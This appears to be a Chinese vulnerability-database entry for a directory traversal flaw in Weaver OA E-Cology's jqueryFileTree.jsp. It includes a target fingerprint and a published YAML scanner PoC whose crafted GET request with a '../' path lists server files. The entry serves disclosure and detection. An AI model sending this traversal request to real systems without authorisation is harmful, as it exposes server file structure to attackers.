e-cology-jqueryfiletree-ile-inclusion: 泛微OA E-Cology jqueryFileTree.jsp 目录遍历漏洞

日期: 2025-09-01 | 影响软件: 泛微OA E-Cology jqueryFileTree | POC: 已公开

漏洞描述

泛微e-cology是专为大中型企业制作的OA办公系统,支持PC端、移动端和微信端同时办公等,其中 jqueryFileTree.jsp 文件中 dir 参数存在目录遍历漏洞,攻击者通过漏洞可以获取服务器文件目录信息 app="泛微-协同办公OA"

PoC代码[已公开]

id: e-cology-jqueryfiletree-ile-inclusion

info:
  name: 泛微OA E-Cology jqueryFileTree.jsp 目录遍历漏洞
  author: zan8in
  severity: high
  description: |
    泛微e-cology是专为大中型企业制作的OA办公系统,支持PC端、移动端和微信端同时办公等,其中 jqueryFileTree.jsp 文件中 dir 参数存在目录遍历漏洞,攻击者通过漏洞可以获取服务器文件目录信息
    app="泛微-协同办公OA"
  reference:
    - http://wiki.peiqi.tech/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20jqueryFileTree.jsp%20%E7%9B%AE%E5%BD%95%E9%81%8D%E5%8E%86%E6%BC%8F%E6%B4%9E.html

rules:
  r0:
    request:
      method: GET
      path: /hrm/hrm_e9/orgChart/js/jquery/plugins/jqueryFileTree/connectors/jqueryFileTree.jsp?dir=/page/resource/userfile/../../
    expression: response.status == 200 && response.body.bcontains(b'index.jsp') && response.body.bcontains(b'PortalCenter.jsp') && response.body.bcontains(b'PortalSettingOperation.jsp')
expression: r0()

相关漏洞推荐